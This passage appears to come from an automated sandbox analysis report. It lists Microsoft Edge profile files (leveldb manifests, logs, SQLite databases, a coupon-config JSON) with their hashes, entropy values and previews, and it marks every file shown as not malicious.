                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):305
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1484154823782005
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7inD1wkn23oH+TcwtnG2tbB2KLlpivyq2Pwkn23oH+TcwtnG2tMsIFUv:7OyfYebn9VFLTNvYfYebn9GFUv
                                                                                                                                                                                                                                                                                  MD5:9209A9277ADE2EE609B28BC6D21CD9DC
                                                                                                                                                                                                                                                                                  SHA1:D40D30F6E8480B06B5BC9D910E4192DE80DEFAB2
                                                                                                                                                                                                                                                                                  SHA-256:6F657E3A13CCA005F656AC7AD4D73462D0276E732DE8137D37DAE49B83848DC2
                                                                                                                                                                                                                                                                                  SHA-512:A303734D47624738908538D049FC4C6A6CEF476A363318B754A02B4D46ECCCEA51842A4C60E79D333A25F88816403C38BD35B0D8830312859FD1C5FDA57F0753
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.618 1ea0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2024/12/10-12:41:28.634 1ea0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.494709561094235
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                                                                                                                                  MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                                                                                                                                  SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                                                                                                                                  SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                                                                                                                                  SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.613867825747277
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLW4QpRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mWvdRvIMAqi:TLqpR+DDNzWjJ0npnyXKUO8+jJp8mL
                                                                                                                                                                                                                                                                                  MD5:3F7CED6BB75AE9F9A9D04392674B853F
                                                                                                                                                                                                                                                                                  SHA1:8E196F4708F5252D9AB6BB35618A1D7871EFEA9B
                                                                                                                                                                                                                                                                                  SHA-256:8ACD25B9474A7BBD9DE6D6A5BD42500C491275E7735A358DADC5D649F8FDA576
                                                                                                                                                                                                                                                                                  SHA-512:FEC48E738ACF9CF91BA7DC6F7AAB7FA6F9C4E30128417738654136D23B78BBB9EFBC62D28C634660ECF5903FF960895379C4924EEC65DE8EE9F83AA61E55F1C3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3541728095281025
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:1A/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:1FdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                  MD5:4482203CE171647CB44D06F7405A77C1
                                                                                                                                                                                                                                                                                  SHA1:E799EA33D605EBAD34FF970237B47A5E44C02AA2
                                                                                                                                                                                                                                                                                  SHA-256:699198BD3617CD01FE45BA428221278847A6433251E431613DEA6B5B22855714
                                                                                                                                                                                                                                                                                  SHA-512:5F9261E6E84ECE6DB81759D7A912F94ABA54A47ACB60D9BF47B633121F2FD3FA621E0C737AE81BEEC55F4B879C517434ACD28AF0AC12A7E6E74F883406CF1382
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.157109102793645
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7lD1wkn23oH+Tcwtk2WwnvB2KLlpI434q2Pwkn23oH+Tcwtk2WwnvIFUv:7UfYebkxwnvFLTivYfYebkxwnQFUv
                                                                                                                                                                                                                                                                                  MD5:40B7F4B028494C6861557F878042E71C
                                                                                                                                                                                                                                                                                  SHA1:834F46D03B31EFE45F75782B6198031B4F8276A6
                                                                                                                                                                                                                                                                                  SHA-256:591DF0D3D4352D5CF5DA1A0A9F67928C73470E4B1A1CD4F6B2FE30B74DF41BE1
                                                                                                                                                                                                                                                                                  SHA-512:CF29BBD953ECFF3CF95B2C00D03BA61A7D0FFA10567B0BF023A9847A1D754B78F0B51574D0CD1130ED12413FB3CD001B79049DA2A9FA6F2F5B32C20AA4B48240
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:35.483 2110 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/10-12:41:35.771 2110 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.324615384555102
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rr:C1gAg1zfvT
                                                                                                                                                                                                                                                                                  MD5:C77BC910D6D495711C531B2DE49642BC
                                                                                                                                                                                                                                                                                  SHA1:160E559FEA8C98A22DE3C0EA3FDC5460EC93DED5
                                                                                                                                                                                                                                                                                  SHA-256:EFD469E51E3C1A0C208F2B617C022B3CB752DE97468455B9DC92F55BE1457C48
                                                                                                                                                                                                                                                                                  SHA-512:C3ECA51CF89716E4591F76593653A98FC30EC4042CCCFD1C16F8FF73AD859F473AA50C8589150A6ADD47F6A1561D9F9C669E91B94E04538AA151DCF54DDC4F29
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.147726950681785
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7i3aRRM1wkn23oH+Tcwt8aVdg2KLlpisq2Pwkn23oH+Tcwt8aPrqIFUv:7OSrfYeb0LT3vYfYebL3FUv
                                                                                                                                                                                                                                                                                  MD5:9EFF0F6634C27C7D30668E1BD0D0FEA4
                                                                                                                                                                                                                                                                                  SHA1:8281E73CA0469575E7A3D1F547FC81B31A837667
                                                                                                                                                                                                                                                                                  SHA-256:78292A6D7411D963BFD41578C5A85E0CB16F77AD1CC3DD4DF15DD773009E18DC
                                                                                                                                                                                                                                                                                  SHA-512:89610083DEB0C40B1A097D77908320263B883D6D92A7FD71AAFE5767D5ED40FB9F399950A3B98EF62C0700D7A3D89E9A0E6331C796AFE868ADABB8692FE77CDD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.656 1e74 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2024/12/10-12:41:28.807 1e74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.116858157294927
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:7ihRRM1wkn23oH+Tcwt86FB2KLlpifq2Pwkn23oH+Tcwt865IFUv:76rfYeb/FFLTEvYfYeb/WFUv
                                                                                                                                                                                                                                                                                  MD5:0060A3F59AC901FBCAB6E383867E22D8
                                                                                                                                                                                                                                                                                  SHA1:5CF91D947773A7DA016C37A3EF5699E5BC65DA95
                                                                                                                                                                                                                                                                                  SHA-256:ABFEB65C0A34C17E62472C104CA46D9EE73AAA995317633180CC76D44D86DB2C
                                                                                                                                                                                                                                                                                  SHA-512:7CCF4727108098637ED09B2ACA877DEE2E5485A2D25FEC456DA511C688BEBCF88247A055BC6BB2A69BFCA0D1A81C62EE37609DD6D91C32809D680A6BF72A1732
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:28.842 1e74 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts since it was missing..2024/12/10-12:41:28.886 1e74 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1197
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                                  MD5:A2A3B1383E3AAC2430F44FC7BF3E447E
                                                                                                                                                                                                                                                                                  SHA1:B807210A1205126A107A5FE25F070D2879407AA4
